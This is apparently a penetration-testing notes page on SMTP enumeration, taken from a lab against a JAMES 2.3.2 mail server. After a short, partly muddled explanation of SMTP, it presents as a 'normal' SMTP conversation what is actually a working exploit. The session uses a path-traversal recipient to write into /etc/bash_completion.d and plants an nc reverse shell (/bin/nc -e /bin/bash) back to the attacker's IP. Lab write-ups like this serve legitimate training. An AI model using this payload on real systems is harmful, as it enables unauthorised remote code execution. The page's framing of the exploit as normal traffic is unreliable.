SMTP Enumeration

What does SMTP stands for ?

Simple Mail Transfer Protocol is an application layer protocol.

If suppose a client wants to send a mail, he / she needs to open a TCP connection to the SMTP server and then send the mail across the connection.

The SMTP server by default is always set to LISTENING mode, when the client sends the mail across the TCP connection the SMTP initiates a connection on the port 25.

The only disadvantage of SMTP is it cannot retrieve messages. It can send,relay,forward messages. By default it uses port 25, but it can also use port 587 and 465 for TLS.

Example of a noraml SMTP conversation

root@kali:~# telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Mon, 30 Dec 2019 17:10:56 -0500 (EST)

EHLO bla.bla
250-solidstate Hello bla.bla (10.10.14.12 [10.10.14.12])
250-PIPELINING
250 ENHANCEDSTATUSCODES

MAIL FROM: <'random@random.com>
250 2.1.0 Sender <'random@random.com> OK

RCPT TO: <../../../../../../../../etc/bash_completion.d>
250 2.1.5 Recipient <../../../../../../../../etc/bash_completion.d@localhost> OK

DATA
354 Ok Send data ending with <CRLF>.<CRLF>
FROM: bla.bla
'
/bin/nc -e /bin/bash 10.10.14.12 1234
.
250 2.6.0 Message received
quit

PreviousSMB Enumeration NextPOP3 Enumeration

Last updated 1 year ago